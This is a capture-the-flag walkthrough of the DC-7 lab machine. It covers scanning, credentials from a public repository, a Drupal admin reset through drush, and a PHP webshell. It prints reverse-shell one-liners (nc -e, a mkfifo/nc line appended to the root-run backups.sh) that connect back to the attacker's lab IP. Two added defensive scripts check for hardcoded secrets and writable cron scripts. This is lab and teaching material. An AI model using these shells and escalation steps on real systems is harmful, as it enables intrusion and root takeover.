DC-7 target machine
2022-07-07 00:52:00 【m0_62094846】
ifconfig
Find the attacking host's IP address.
Sweep the internal network to find live hosts:
nmap 192.168.61.0/24
Use nmap to scan the DC-7 target for open ports (all ports, with service and version detection, saving the output to a file):
nmap -A -T4 192.168.61.136 -p- -oN nmap136.A
Ports 22 (SSH) and 80 (HTTP) are open.
The page footer hints at DC7USER.
A web search for that name turns up a repository that can be downloaded.
This is also flagged as an important point.
Download it to the local Kali machine:
git clone https://github.com/Dc7User/staffdb
cd staffdb
ls
cat config.php
SSH to the target with the credentials found in config.php and log in as dc7user; the connection succeeds.
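The foothold above comes from a configuration file committed to a public repository. The defender's counterpart is a check that flags hardcoded credentials before a push reaches a public remote. The following is an added example, not code from the post or from the staffdb repository: a small scanner for secret-looking PHP assignments, run against a constructed config.php. SAMPLE_CONFIG_PHP, find_hardcoded_secrets and mask are this example's own names and assumptions.

```python
import re

# Constructed sample of a PHP config file; it is NOT the real staffdb config.php.
SAMPLE_CONFIG_PHP = '''<?php
$servername = "localhost";
$username = "dbuser";
$password = "changeme-example";
$dbname = "Staff";
$debug = false;
?>'''

# Variable names that commonly carry secrets in PHP configs; extend as needed.
SECRET_NAMES = re.compile(r"(pass(word|wd)?|secret|token|api_?key)", re.IGNORECASE)

# A PHP assignment of a quoted string literal: $name = "value"; or $name = 'value';
ASSIGNMENT = re.compile(r"""^\s*\$(\w+)\s*=\s*(['"])(.*?)\2\s*;""")


def mask(value: str) -> str:
    """Keep only the first and last two characters so a report never leaks the secret."""
    if len(value) <= 4:
        return "*" * len(value)
    return value[:2] + "*" * (len(value) - 4) + value[-2:]


def find_hardcoded_secrets(text: str) -> list[dict]:
    """Return one finding per line that assigns a non-empty literal to a secret-looking variable.

    Each finding carries the line number, the variable name and a masked preview,
    which is enough for a reviewer to locate the value without the report itself
    becoming a copy of the credential.
    """
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        m = ASSIGNMENT.match(line)
        if not m:
            continue
        name, _quote, value = m.groups()
        if SECRET_NAMES.search(name) and value:
            findings.append({"line": lineno, "name": name, "preview": mask(value)})
    return findings


if __name__ == "__main__":
    for f in find_hardcoded_secrets(SAMPLE_CONFIG_PHP):
        print(f"line {f['line']}: ${f['name']} = {f['preview']}")
```

Run as a pre-commit hook over *.php files, a non-empty result should block the commit; the same check on an already-public repository tells you which credentials must be rotated, since the history keeps them even after the line is removed.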
ls
The home directory contains backups and mbox.
Under backups: website.sql.gpg website.tar.gz.gpg
Two files, both with a .gpg extension; gpg is used to encrypt files, so the encrypted contents read as garbage.
mbox is a regular file (a local mailbox).
It reveals that the backup job is run from a script under /opt/scripts.
Change into /opt/scripts:
cd /opt/scripts
View the script:
cat backups.sh
Two commands stand out: gpg and drush.
gpg encrypts the backups; drush is the Drupal command-line tool used for site configuration, and it can change a user's password.
Change into /var/www/html, since the site has an admin user, and use drush to reset admin's password to 123456; the reset succeeds:
cd /var/www/html/
drush user-password admin --password="123456"
admin's password is now 123456.
Use dirb to enumerate the site's pages:
dirb http://192.168.61.136
Under Content -> Add content -> Basic page, the plan is to add PHP code for a reverse shell, but PHP is not accepted there.
A search shows that PHP has to be installed as a separate module.
Download URL for the PHP module:
https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz
Tick the module, then click Install at the bottom.
That is all it takes.
Back on the earlier page, PHP can now be used.
AntSword (蚁剑) connects successfully.
Then start a listener on Kali:
nc -lvvp 4444
nc -e /bin/bash 192.168.61.129 4444
python -c 'import pty;pty.spawn("/bin/bash")'
Connected.
find / -name backups.sh 2>/dev/null
Then:
cd /opt/scripts
ls -l
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.61.129 7777 >/tmp/f" >> backups.sh
nc -lvvp 7777
Root shell obtained.
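The escalation above works because a script that root runs on a schedule can be modified by a lower-privileged account. The check a defender wants is an audit that lists every file in a scheduled-task directory that someone other than its owner can write to. The following is an added example, not code from the post: a small audit in Python that walks a directory and reports group- or world-writable regular files, exercised against a constructed layout in a temporary directory (not the DC-7 filesystem). audit_script_dir, build_demo_dir and run_demo are this example's own names.

```python
import os
import stat
import tempfile
from pathlib import Path

# Permission bits that let someone other than the owner modify the file.
GROUP_WRITE = stat.S_IWGRP
WORLD_WRITE = stat.S_IWOTH


def audit_script_dir(directory: str) -> list[dict]:
    """Walk `directory` and report every regular file that a non-owner can modify.

    Each finding records the path, octal mode, owner uid and gid so an analyst can
    compare the file's owner against the account the scheduled job runs as.
    Symlinks are skipped: their own mode bits are not what gets executed.
    """
    findings = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            p = Path(root) / name
            if p.is_symlink() or not p.is_file():
                continue
            st = p.stat()
            if st.st_mode & (GROUP_WRITE | WORLD_WRITE):
                findings.append({
                    "path": str(p),
                    "mode": oct(stat.S_IMODE(st.st_mode)),
                    "uid": st.st_uid,
                    "gid": st.st_gid,
                    "world_writable": bool(st.st_mode & WORLD_WRITE),
                })
    return findings


def build_demo_dir(base: str) -> str:
    """Construct a sample layout (not the DC-7 filesystem) to exercise the audit."""
    scripts = Path(base) / "scripts"
    scripts.mkdir(parents=True, exist_ok=True)
    safe = scripts / "rotate.sh"
    safe.write_text("#!/bin/sh\necho rotate\n")
    safe.chmod(0o755)   # owner-writable only: should not be reported
    loose = scripts / "backups.sh"
    loose.write_text("#!/bin/sh\necho backup\n")
    loose.chmod(0o775)  # group-writable: any group member can append to it
    return str(scripts)


def run_demo() -> list[dict]:
    """Build the constructed layout in a temporary directory and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_script_dir(build_demo_dir(tmp))


if __name__ == "__main__":
    for f in run_demo():
        print(f"{f['mode']} uid={f['uid']} gid={f['gid']} {f['path']}")
```

On a real host, point audit_script_dir at the directories referenced from root's crontab and /etc/cron.*; any hit whose gid is the web server's group is exactly the condition this walkthrough exploits, and the fix is to make the script root-owned with mode 0755 or tighter.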
cd /root
ls
cat theflag.txt